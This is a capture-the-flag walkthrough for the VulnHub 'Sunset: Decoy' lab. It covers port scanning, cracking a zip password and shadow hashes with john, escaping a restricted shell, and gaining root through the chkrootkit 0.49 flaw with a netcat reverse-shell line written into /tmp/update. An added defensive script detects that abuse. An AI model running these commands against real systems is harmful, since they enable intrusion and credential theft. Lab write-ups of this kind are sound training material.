PJzhang: VulnHub target machine, sunset series, SUNSET: DECOY
猫宁~~~
Address: https://www.vulnhub.com/entry/sunset-decoy,505/
Focus on the tools and the approach.
nmap 192.168.43.0/24
Target machine IP
192.168.43.32
Attacker machine
192.168.43.154
nmap -A -p1-65535 192.168.43.32
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38
Browsing to http://192.168.43.32/ shows a directory listing that exposes the file save.zip; extracting it requires a password.
dirb http://192.168.43.32/
zip2john save.zip > pojie.hash
cat pojie.hash
john --wordlist=/usr/share/wordlists/rockyou.txt pojie.hash
Result: manuel (save.zip)
unzip save.zip
Enter the password manuel
This extracts a folder etc containing the files group, hostname, hosts, passwd, shadow and sudoers
Change into /root/Desktop/etc
cat shadow
john --wordlist=/usr/share/wordlists/rockyou.txt shadow
This gives
server (296640a3b825115a47b68fc44501c828)
296640a3b825115a47b68fc44501c828 is the username
ssh 296640a3b825115a47b68fc44501c828@192.168.43.32
Password: server
The shell reports: -rbash: dircolors: command not found
ssh 296640a3b825115a47b68fc44501c828@192.168.43.32 -t "bash --noprofile"
echo $PATH
PATH:/home/296640a3b825115a47b68fc44501c828/
Modify the PATH environment variable
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
cat user.txt
35253d886842075b2c6390f35946e41f
./honeypot.decoy (run the binary)
cd /home/296640a3b825115a47b68fc44501c828/SV-502/logs
cat log.txt
2020/06/27 18:56:58 CMD: UID=0 PID=12386 | tar -xvzf chkrootkit-0.49.tar.gz
searchsploit chkrootkit
Chkrootkit 0.49 - Local Privilege Escalation linux/local/33899.txt
https://www.exploit-db.com/exploits/33899
echo "/usr/bin/nc -e /bin/sh 192.168.43.154 4444" > /tmp/update
chmod +777 /tmp/update
Change into /home/296640a3b825115a47b68fc44501c828/
./honeypot.decoy
Choose
5 Launch an AV Scan.
Attacker machine: nc -lvnp 4444
connect to [192.168.43.154] from (UNKNOWN) [192.168.43.32] 4444
Access obtained
id
uid=0(root) gid=0(root) groups=0(root)
cat root.txt
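
Seen from the defender's side, the escalation above leaves two artifacts: root-run chkrootkit 0.49 entries in a process log such as log.txt, and a file at /tmp/update waiting for the scan. The shell script below is an added example, not part of the original write-up; the function names are hypothetical and the sample log lines are constructed (the first copies the log.txt entry shown above).

```shell
#!/bin/sh
# Added defensive example; not part of the original write-up.
# SAMPLE_LOG is constructed: line 1 copies the log.txt entry above,
# lines 2-3 (including the /root/... path) are invented for the demo.
SAMPLE_LOG='2020/06/27 18:56:58 CMD: UID=0 PID=12386 | tar -xvzf chkrootkit-0.49.tar.gz
2020/06/27 18:57:02 CMD: UID=1000 PID=12390 | ls -la
2020/06/27 18:58:10 CMD: UID=0 PID=12401 | /bin/sh /root/chkrootkit-0.49/chkrootkit'

# Read process-monitor lines (log.txt format) on stdin and print the
# command part of every root-run (UID=0) entry that mentions chkrootkit 0.49.
root_chkrootkit_events() {
    awk '/ CMD: UID=0 / && /chkrootkit-0\.49/ { sub(/^.*[|] /, ""); print }'
}

# Audit the file the walkthrough plants before the scan runs.
# Exit status: 0 = path absent, 1 = present (details on stdout).
# The mode string is inspected instead of "test -x" so the result does
# not depend on who runs the audit or on noexec mount options.
audit_update_file() {
    path=${1:-/tmp/update}
    [ -e "$path" ] || { echo "ok: $path absent"; return 0; }
    set -- $(ls -ldn "$path")      # $1 = mode string, $3 = numeric owner uid
    case $1 in
        *x*) state="present+executable" ;;
        *)   state="present" ;;
    esac
    echo "ALERT: $path $state mode=$1 owner_uid=$3"
    return 1
}

# Demo run: scan the constructed log, then audit the real /tmp/update.
printf '%s\n' "$SAMPLE_LOG" | root_chkrootkit_events
audit_update_file /tmp/update || true
```

An ALERT with an owner_uid other than 0 means an unprivileged account placed the file; remove it and upgrade or remove chkrootkit 0.49 before the scan runs as root again.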